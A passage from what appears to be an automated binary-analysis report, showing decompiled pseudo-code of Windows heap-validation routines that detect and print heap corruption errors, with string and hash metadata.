                                            					_push(_t104);
                                            					E00FEB150();
                                            				} else {
                                            					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				_push( *0x10d589c);
                                            				E00FEB150("Heap error detected at %p (heap handle %p)\n",  *0x10d58a0);
                                            				_t27 =  *0x10d5898; // 0x0
                                            				if(_t27 <= 0xf) {
                                            					switch( *((intOrPtr*)(_t27 * 4 +  &M010A1E96))) {
                                            						case 0:
                                            							_t105 = "heap_failure_internal";
                                            							goto L21;
                                            						case 1:
                                            							goto L21;
                                            						case 2:
                                            							goto L21;
                                            						case 3:
                                            							goto L21;
                                            						case 4:
                                            							goto L21;
                                            						case 5:
                                            							goto L21;
                                            						case 6:
                                            							goto L21;
                                            						case 7:
                                            							goto L21;
                                            						case 8:
                                            							goto L21;
                                            						case 9:
                                            							goto L21;
                                            						case 0xa:
                                            							goto L21;
                                            						case 0xb:
                                            							goto L21;
                                            						case 0xc:
                                            							goto L21;
                                            						case 0xd:
                                            							goto L21;
                                            						case 0xe:
                                            							goto L21;
                                            						case 0xf:
                                            							goto L21;
                                            					}
                                            				}
                                            				L21:
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E00FEB150();
                                            				} else {
                                            					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				_push(_t105);
                                            				E00FEB150("Error code: %d - %s\n",  *0x10d5898);
                                            				_t113 =  *0x10d58a4; // 0x0
                                            				if(_t113 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E00FEB150();
                                            					} else {
                                            						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E00FEB150("Parameter1: %p\n",  *0x10d58a4);
                                            				}
                                            				_t115 =  *0x10d58a8; // 0x0
                                            				if(_t115 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E00FEB150();
                                            					} else {
                                            						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E00FEB150("Parameter2: %p\n",  *0x10d58a8);
                                            				}
                                            				_t117 =  *0x10d58ac; // 0x0
                                            				if(_t117 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E00FEB150();
                                            					} else {
                                            						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E00FEB150("Parameter3: %p\n",  *0x10d58ac);
                                            				}
                                            				_t119 =  *0x10d58b0; // 0x0
                                            				if(_t119 != 0) {
                                            					L41:
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E00FEB150();
                                            					} else {
                                            						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push( *0x10d58b4);
                                            					E00FEB150("Last known valid blocks: before - %p, after - %p\n",  *0x10d58b0);
                                            				} else {
                                            					_t120 =  *0x10d58b4; // 0x0
                                            					if(_t120 != 0) {
                                            						goto L41;
                                            					}
                                            				}
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E00FEB150();
                                            				} else {
                                            					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				return E00FEB150("Stack trace available at %p\n", 0x10d58c0);
                                            			}












                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                            • API String ID: 0-2897834094
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E010A4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                            				signed int _v6;
                                            				signed int _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed int _t189;
                                            				intOrPtr _t191;
                                            				intOrPtr _t210;
                                            				signed int _t225;
                                            				signed char _t231;
                                            				intOrPtr _t232;
                                            				unsigned int _t245;
                                            				intOrPtr _t249;
                                            				intOrPtr _t259;
                                            				signed int _t281;
                                            				signed int _t283;
                                            				intOrPtr _t284;
                                            				signed int _t288;
                                            				signed int* _t294;
                                            				signed int* _t298;
                                            				intOrPtr* _t299;
                                            				intOrPtr* _t300;
                                            				signed int _t307;
                                            				signed int _t309;
                                            				signed short _t312;
                                            				signed short _t315;
                                            				signed int _t317;
                                            				signed int _t320;
                                            				signed int _t322;
                                            				signed int _t326;
                                            				signed int _t327;
                                            				void* _t328;
                                            				signed int _t332;
                                            				signed int _t340;
                                            				signed int _t342;
                                            				signed char _t344;
                                            				signed int* _t345;
                                            				void* _t346;
                                            				signed char _t352;
                                            				signed char _t367;
                                            				signed int _t374;
                                            				intOrPtr* _t378;
                                            				signed int _t380;
                                            				signed int _t385;
                                            				signed char _t390;
                                            				unsigned int _t392;
                                            				signed char _t395;
                                            				unsigned int _t397;
                                            				intOrPtr* _t400;
                                            				signed int _t402;
                                            				signed int _t405;
                                            				intOrPtr* _t406;
                                            				signed int _t407;
                                            				intOrPtr _t412;
                                            				void* _t414;
                                            				signed int _t415;
                                            				signed int _t416;
                                            				signed int _t429;
                                            
                                            				_v16 = _v16 & 0x00000000;
                                            				_t189 = 0;
                                            				_v8 = _v8 & 0;
                                            				_t332 = __edx;
                                            				_v12 = 0;
                                            				_t414 = __ecx;
                                            				_t415 = __edx;
                                            				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                            					L88:
                                            					_t416 = _v16;
                                            					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                            						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                            						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                            							L107:
                                            							return 1;
                                            						}
                                            						_t191 =  *[fs:0x30];
                                            						__eflags =  *(_t191 + 0xc);
                                            						if( *(_t191 + 0xc) == 0) {
                                            							_push("HEAP: ");
                                            							E00FEB150();
                                            						} else {
                                            							E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            						}
                                            						_push(_v12);
                                            						_push( *((intOrPtr*)(_t332 + 0x30)));
                                            						_push(_t332);
                                            						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                            						L122:
                                            						E00FEB150();
                                            						L119:
                                            						return 0;
                                            					}
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push("HEAP: ");
                                            						E00FEB150();
                                            					} else {
                                            						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push(_t416);
                                            					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                            					_push(_t332);
                                            					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                            					goto L122;
                                            				} else {
                                            					goto L1;
                                            				}
                                            				do {
                                            					L1:
                                            					 *_a16 = _t415;
                                            					if( *(_t414 + 0x4c) != 0) {
                                            						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                            						 *_t415 = _t392;
                                            						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                            						_t424 = _t392 >> 0x18 - _t352;
                                            						if(_t392 >> 0x18 != _t352) {
                                            							_push(_t352);
                                            							E0109FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                            						}
                                            					}
                                            					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                            						_t210 =  *[fs:0x30];
                                            						__eflags =  *(_t210 + 0xc);
                                            						if( *(_t210 + 0xc) == 0) {
                                            							_push("HEAP: ");
                                            							E00FEB150();
                                            						} else {
                                            							E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            						}
                                            						_push(_v8 & 0x0000ffff);
                                            						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                            						__eflags = _t340;
                                            						_push(_t340);
                                            						E00FEB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                            						L117:
                                            						__eflags =  *(_t414 + 0x4c);
                                            						if( *(_t414 + 0x4c) != 0) {
                                            							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                            							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            							__eflags =  *_t415;
                                            						}
                                            						goto L119;
                                            					}
                                            					_t225 =  *_t415 & 0x0000ffff;
                                            					_t390 =  *(_t415 + 2);
                                            					_t342 = _t225;
                                            					_v8 = _t342;
                                            					_v20 = _t342;
                                            					_v28 = _t225 << 3;
                                            					if((_t390 & 0x00000001) == 0) {
                                            						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                            						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                            						__eflags = _t344 & 0x00000001;
                                            						if((_t344 & 0x00000001) == 0) {
                                            							L66:
                                            							_t345 = _a12;
                                            							 *_a8 =  *_a8 + 1;
                                            							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                            							__eflags =  *_t345;
                                            							L67:
                                            							_t231 =  *(_t415 + 6);
                                            							if(_t231 == 0) {
                                            								_t346 = _t414;
                                            							} else {
                                            								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                            							}
                                            							if(_t346 != _t332) {
                                            								_t232 =  *[fs:0x30];
                                            								__eflags =  *(_t232 + 0xc);
                                            								if( *(_t232 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E00FEB150();
                                            								} else {
                                            									E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push( *(_t415 + 6) & 0x000000ff);
                                            								_push(_t415);
                                            								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                            								goto L95;
                                            							} else {
                                            								if( *((char*)(_t415 + 7)) != 3) {
                                            									__eflags =  *(_t414 + 0x4c);
                                            									if( *(_t414 + 0x4c) != 0) {
                                            										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                            										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            										__eflags =  *_t415;
                                            									}
                                            									_t415 = _t415 + _v28;
                                            									__eflags = _t415;
                                            									goto L86;
                                            								}
                                            								_t245 =  *(_t415 + 0x1c);
                                            								if(_t245 == 0) {
                                            									_t395 =  *_t415 & 0x0000ffff;
                                            									_v6 = _t395 >> 8;
                                            									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                            									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                            										__eflags =  *(_t414 + 0x4c);
                                            										if( *(_t414 + 0x4c) != 0) {
                                            											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                            											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            											__eflags =  *_t415;
                                            										}
                                            										goto L107;
                                            									}
                                            									_t249 =  *[fs:0x30];
                                            									__eflags =  *(_t249 + 0xc);
                                            									if( *(_t249 + 0xc) == 0) {
                                            										_push("HEAP: ");
                                            										E00FEB150();
                                            									} else {
                                            										E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            									}
                                            									_push( *((intOrPtr*)(_t332 + 0x28)));
                                            									_push(_t415);
                                            									_push("Heap block at %p is not last block in segment (%p)\n");
                                            									L95:
                                            									E00FEB150();
                                            									goto L117;
                                            								}
                                            								_v12 = _v12 + 1;
                                            								_v16 = _v16 + (_t245 >> 0xc);
                                            								if( *(_t414 + 0x4c) != 0) {
                                            									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                            									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            								}
                                            								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                            								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                            									L82:
                                            									_v8 = _v8 & 0x00000000;
                                            									goto L86;
                                            								} else {
                                            									if( *(_t414 + 0x4c) != 0) {
                                            										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                            										 *_t415 = _t397;
                                            										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                            										_t442 = _t397 >> 0x18 - _t367;
                                            										if(_t397 >> 0x18 != _t367) {
                                            											_push(_t367);
                                            											E0109FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                            										}
                                            									}
                                            									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                            										_t259 =  *[fs:0x30];
                                            										__eflags =  *(_t259 + 0xc);
                                            										if( *(_t259 + 0xc) == 0) {
                                            											_push("HEAP: ");
                                            											E00FEB150();
                                            										} else {
                                            											E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            										}
                                            										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                            										_push(_t415);
                                            										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                            										goto L95;
                                            									} else {
                                            										if( *(_t414 + 0x4c) != 0) {
                                            											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                            											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            										}
                                            										goto L82;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						_t281 = _v28 + 0xfffffff0;
                                            						_v24 = _t281;
                                            						__eflags = _t390 & 0x00000002;
                                            						if((_t390 & 0x00000002) != 0) {
                                            							__eflags = _t281 - 4;
                                            							if(_t281 > 4) {
                                            								_t281 = _t281 - 4;
                                            								__eflags = _t281;
                                            								_v24 = _t281;
                                            							}
                                            						}
                                            						__eflags = _t390 & 0x00000008;
                                            						if((_t390 & 0x00000008) == 0) {
                                            							_t102 = _t415 + 0x10; // -8
                                            							_t283 = E0103D540(_t102, _t281, 0xfeeefeee);
                                            							_v20 = _t283;
                                            							__eflags = _t283 - _v24;
                                            							if(_t283 != _v24) {
                                            								_t284 =  *[fs:0x30];
                                            								__eflags =  *(_t284 + 0xc);
                                            								if( *(_t284 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E00FEB150();
                                            								} else {
                                            									E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_t288 = _v20 + 8 + _t415;
                                            								__eflags = _t288;
                                            								_push(_t288);
                                            								_push(_t415);
                                            								_push("Free Heap block %p modified at %p after it was freed\n");
                                            								goto L95;
                                            							}
                                            							goto L66;
                                            						} else {
                                            							_t374 =  *(_t415 + 8);
                                            							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                            							_v24 = _t374;
                                            							_v28 = _t400;
                                            							_t294 =  *(_t374 + 4);
                                            							__eflags =  *_t400 - _t294;
                                            							if( *_t400 != _t294) {
                                            								L64:
                                            								_push(_t374);
                                            								_push( *_t400);
                                            								_t101 = _t415 + 8; // -16
                                            								E010AA80D(_t414, 0xd, _t101, _t294);
                                            								goto L86;
                                            							}
                                            							_t56 = _t415 + 8; // -16
                                            							__eflags =  *_t400 - _t56;
                                            							_t374 = _v24;
                                            							if( *_t400 != _t56) {
                                            								goto L64;
                                            							}
                                            							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                            							_t402 =  *(_t414 + 0xb4);
                                            							__eflags = _t402;
                                            							if(_t402 == 0) {
                                            								L35:
                                            								_t298 = _v28;
                                            								 *_t298 = _t374;
                                            								 *(_t374 + 4) = _t298;
                                            								__eflags =  *(_t415 + 2) & 0x00000008;
                                            								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                            									L39:
                                            									_t377 =  *_t415 & 0x0000ffff;
                                            									_t299 = _t414 + 0xc0;
                                            									_v28 =  *_t415 & 0x0000ffff;
                                            									 *(_t415 + 2) = 0;
                                            									 *((char*)(_t415 + 7)) = 0;
                                            									__eflags =  *(_t414 + 0xb4);
                                            									if( *(_t414 + 0xb4) == 0) {
                                            										_t378 =  *_t299;
                                            									} else {
                                            										_t378 = E0100E12C(_t414, _t377);
                                            										_t299 = _t414 + 0xc0;
                                            									}
                                            									__eflags = _t299 - _t378;
                                            									if(_t299 == _t378) {
                                            										L51:
                                            										_t300 =  *((intOrPtr*)(_t378 + 4));
                                            										__eflags =  *_t300 - _t378;
                                            										if( *_t300 != _t378) {
                                            											_push(_t378);
                                            											_push( *_t300);
                                            											__eflags = 0;
                                            											E010AA80D(0, 0xd, _t378, 0);
                                            										} else {
                                            											_t87 = _t415 + 8; // -16
                                            											_t406 = _t87;
                                            											 *_t406 = _t378;
                                            											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                            											 *_t300 = _t406;
                                            											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                            										}
                                            										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                            										_t405 =  *(_t414 + 0xb4);
                                            										__eflags = _t405;
                                            										if(_t405 == 0) {
                                            											L61:
                                            											__eflags =  *(_t414 + 0x4c);
                                            											if(__eflags != 0) {
                                            												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                            												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            											}
                                            											goto L86;
                                            										} else {
                                            											_t380 =  *_t415 & 0x0000ffff;
                                            											while(1) {
                                            												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                            												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                            													break;
                                            												}
                                            												_t307 =  *_t405;
                                            												__eflags = _t307;
                                            												if(_t307 == 0) {
                                            													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                            													L60:
                                            													_t94 = _t415 + 8; // -16
                                            													E0100E4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                            													goto L61;
                                            												}
                                            												_t405 = _t307;
                                            											}
                                            											_t309 = _t380;
                                            											goto L60;
                                            										}
                                            									} else {
                                            										_t407 =  *(_t414 + 0x4c);
                                            										while(1) {
                                            											__eflags = _t407;
                                            											if(_t407 == 0) {
                                            												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                            											} else {
                                            												_t315 =  *(_t378 - 8);
                                            												_t407 =  *(_t414 + 0x4c);
                                            												__eflags = _t315 & _t407;
                                            												if((_t315 & _t407) != 0) {
                                            													_t315 = _t315 ^  *(_t414 + 0x50);
                                            													__eflags = _t315;
                                            												}
                                            												_t312 = _t315 & 0x0000ffff;
                                            											}
                                            											__eflags = _v28 - (_t312 & 0x0000ffff);
                                            											if(_v28 <= (_t312 & 0x0000ffff)) {
                                            												goto L51;
                                            											}
                                            											_t378 =  *_t378;
                                            											__eflags = _t414 + 0xc0 - _t378;
                                            											if(_t414 + 0xc0 != _t378) {
                                            												continue;
                                            											}
                                            											goto L51;
                                            										}
                                            										goto L51;
                                            									}
                                            								}
                                            								_t317 = E0100A229(_t414, _t415);
                                            								__eflags = _t317;
                                            								if(_t317 != 0) {
                                            									goto L39;
                                            								}
                                            								E0100A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                            								goto L86;
                                            							}
                                            							_t385 =  *_t415 & 0x0000ffff;
                                            							while(1) {
                                            								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                            								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                            									break;
                                            								}
                                            								_t320 =  *_t402;
                                            								__eflags = _t320;
                                            								if(_t320 == 0) {
                                            									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                            									L34:
                                            									_t63 = _t415 + 8; // -16
                                            									E0100BC04(_t414, _t402, 1, _t63, _t322, _t385);
                                            									_t374 = _v24;
                                            									goto L35;
                                            								}
                                            								_t402 = _t320;
                                            							}
                                            							_t322 = _t385;
                                            							goto L34;
                                            						}
                                            					}
                                            					if(_a20 == 0) {
                                            						L18:
                                            						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                            							goto L67;
                                            						}
                                            						if(E010923E3(_t414, _t415) == 0) {
                                            							goto L117;
                                            						}
                                            						goto L67;
                                            					} else {
                                            						if((_t390 & 0x00000002) == 0) {
                                            							_t326 =  *(_t415 + 3) & 0x000000ff;
                                            						} else {
                                            							_t328 = E00FE1F5B(_t415);
                                            							_t342 = _v20;
                                            							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                            						}
                                            						_t429 = _t326;
                                            						if(_t429 == 0) {
                                            							goto L18;
                                            						}
                                            						if(_t429 >= 0) {
                                            							__eflags = _t326 & 0x00000800;
                                            							if(__eflags != 0) {
                                            								goto L18;
                                            							}
                                            							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                            							if(__eflags >= 0) {
                                            								goto L18;
                                            							}
                                            							_t412 = _a20;
                                            							_t327 = _t326 & 0x0000ffff;
                                            							L17:
                                            							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                            							goto L18;
                                            						}
                                            						_t327 = _t326 & 0x00007fff;
                                            						if(_t327 >= 0x81) {
                                            							goto L18;
                                            						}
                                            						_t412 = _a24;
                                            						goto L17;
                                            					}
                                            					L86:
                                            				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                            				_t189 = _v12;
                                            				goto L88;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                            • API String ID: 0-3591852110
                                            • Opcode ID: d547657117514410a6463564b1decd81b34316603f643a29bfe4ce6f3b5ed423
                                            • Instruction ID: 218e93b3ab540991a9662d178eef08cb1fe0f21c8986b6e17a7d6bc04b4cb2c4
                                            • Opcode Fuzzy Hash: d547657117514410a6463564b1decd81b34316603f643a29bfe4ce6f3b5ed423
                                            • Instruction Fuzzy Hash: 2312D234204642DFD725DFA9C495BBABBE5FF04310F588499E5C6CB682D7B8E880CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 56%
                                            			E010A4496(signed int* __ecx, void* __edx) {
                                            				signed int _v5;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed char _v24;
                                            				signed int* _v28;
                                            				char _v32;
                                            				signed int* _v36;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				void* _t150;
                                            				intOrPtr _t151;
                                            				signed char _t156;
                                            				intOrPtr _t157;
                                            				unsigned int _t169;
                                            				intOrPtr _t170;
                                            				signed int* _t183;
                                            				signed char _t184;
                                            				intOrPtr _t191;
                                            				signed int _t201;
                                            				intOrPtr _t203;
                                            				intOrPtr _t212;
                                            				intOrPtr _t220;
                                            				signed int _t230;
                                            				signed int _t241;
                                            				signed int _t244;
                                            				void* _t259;
                                            				signed int _t260;
                                            				signed int* _t261;
                                            				intOrPtr* _t262;
                                            				signed int _t263;
                                            				signed int* _t264;
                                            				signed int _t267;
                                            				signed int* _t268;
                                            				void* _t270;
                                            				void* _t281;
                                            				signed short _t285;
                                            				signed short _t289;
                                            				signed int _t291;
                                            				signed int _t298;
                                            				signed char _t303;
                                            				signed char _t308;
                                            				signed int _t314;
                                            				intOrPtr _t317;
                                            				unsigned int _t319;
                                            				signed int* _t325;
                                            				signed int _t326;
                                            				signed int _t327;
                                            				intOrPtr _t328;
                                            				signed int _t329;
                                            				signed int _t330;
                                            				signed int* _t331;
                                            				signed int _t332;
                                            				signed int _t350;
                                            
                                            				_t259 = __edx;
                                            				_t331 = __ecx;
                                            				_v28 = __ecx;
                                            				_v20 = 0;
                                            				_v12 = 0;
                                            				_t150 = E010A49A4(__ecx);
                                            				_t267 = 1;
                                            				if(_t150 == 0) {
                                            					L61:
                                            					_t151 =  *[fs:0x30];
                                            					__eflags =  *((char*)(_t151 + 2));
                                            					if( *((char*)(_t151 + 2)) != 0) {
                                            						 *0x10d6378 = _t267;
                                            						asm("int3");
                                            						 *0x10d6378 = 0;
                                            					}
                                            					__eflags = _v12;
                                            					if(_v12 != 0) {
                                            						_t105 =  &_v16;
                                            						 *_t105 = _v16 & 0x00000000;
                                            						__eflags =  *_t105;
                                            						E0101174B( &_v12,  &_v16, 0x8000);
                                            					}
                                            					L65:
                                            					__eflags = 0;
                                            					return 0;
                                            				}
                                            				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                            					_t268 =  &(_t331[0x30]);
                                            					_v32 = 0;
                                            					_t260 =  *_t268;
                                            					_t308 = 0;
                                            					_v24 = 0;
                                            					while(_t268 != _t260) {
                                            						_t260 =  *_t260;
                                            						_v16 =  *_t325 & 0x0000ffff;
                                            						_t156 = _t325[0];
                                            						_v28 = _t325;
                                            						_v5 = _t156;
                                            						__eflags = _t156 & 0x00000001;
                                            						if((_t156 & 0x00000001) != 0) {
                                            							_t157 =  *[fs:0x30];
                                            							__eflags =  *(_t157 + 0xc);
                                            							if( *(_t157 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E00FEB150();
                                            							} else {
                                            								E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push(_t325);
                                            							E00FEB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                            							L32:
                                            							_t270 = 0;
                                            							__eflags = _t331[0x13];
                                            							if(_t331[0x13] != 0) {
                                            								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                            								 *_t325 =  *_t325 ^ _t331[0x14];
                                            							}
                                            							L60:
                                            							_t267 = _t270 + 1;
                                            							__eflags = _t267;
                                            							goto L61;
                                            						}
                                            						_t169 =  *_t325 & 0x0000ffff;
                                            						__eflags = _t169 - _t308;
                                            						if(_t169 < _t308) {
                                            							_t170 =  *[fs:0x30];
                                            							__eflags =  *(_t170 + 0xc);
                                            							if( *(_t170 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E00FEB150();
                                            							} else {
                                            								E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							E00FEB150("Non-Dedicated free list element %p is out of order\n", _t325);
                                            							goto L32;
                                            						} else {
                                            							__eflags = _t331[0x13];
                                            							_t308 = _t169;
                                            							_v24 = _t308;
                                            							if(_t331[0x13] != 0) {
                                            								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                            								 *_t325 =  *_t325 ^ _t331[0x14];
                                            								__eflags =  *_t325;
                                            							}
                                            							_t26 =  &_v32;
                                            							 *_t26 = _v32 + 1;
                                            							__eflags =  *_t26;
                                            							continue;
                                            						}
                                            					}
                                            					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                            					if( *0x10d6350 != 0 && _t331[0x2f] != 0) {
                                            						_push(4);
                                            						_push(0x1000);
                                            						_push( &_v16);
                                            						_push(0);
                                            						_push( &_v12);
                                            						_push(0xffffffff);
                                            						if(E01029660() >= 0) {
